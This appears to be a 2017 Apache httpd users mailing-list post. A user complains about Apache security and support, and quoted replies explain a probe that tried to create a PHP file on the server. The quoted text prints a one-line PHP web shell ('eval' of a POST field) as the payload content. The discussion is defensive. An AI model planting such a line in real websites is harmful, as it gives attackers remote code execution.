I see these type of attack strings all the time on Nginx except Nginx gives a 403. Apache is notoriously bad with security and giving 200 ok responses makes you **** yourself. A reason I and many other people have switched. User support on this list was also non existent when I ran into serious SSL problems with 2.4 that until today have been ignored and unanswered.
On 06 Feb 2017 19:21, "Ken Robinson" <kenrb...@rbnsn.com> wrote: > > > On 2017-02-06 12:08 pm, Lentes, Bernd wrote: > > The first line is trying to create the file webconfig.txt.php in your >>> DOCUMENT_ROOT directory, with the contents of the file being: >>> >>> <?php eval($_POST[1]);?> >>> >>> I didn't decode the remaining lines. I think they're just trying to do >>> the same >>> thing. >>> >> >> Fortunately there is no webconfig.txt.php. And all folders in /srv/www >> belongs to root and user wwwrun >> is not allowed to write there. >> > > What seems to be happening here is that your system is being probed for > vulnerabilities. > > The attacker is sending a payload string to your index.php file in hopes > that it will not complain and write the string to the file > webconfig.txt.php which the attacker would then attempt to get to with the > real hack in the Posted contents. Are there any requests to get to that > file? > > You should make sure you sanitized any input to your index.php and reject > anything that's not expected. > > Ken > > --------------------------------------------------------------------- > To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org > For additional commands, e-mail: users-h...@httpd.apache.org > >
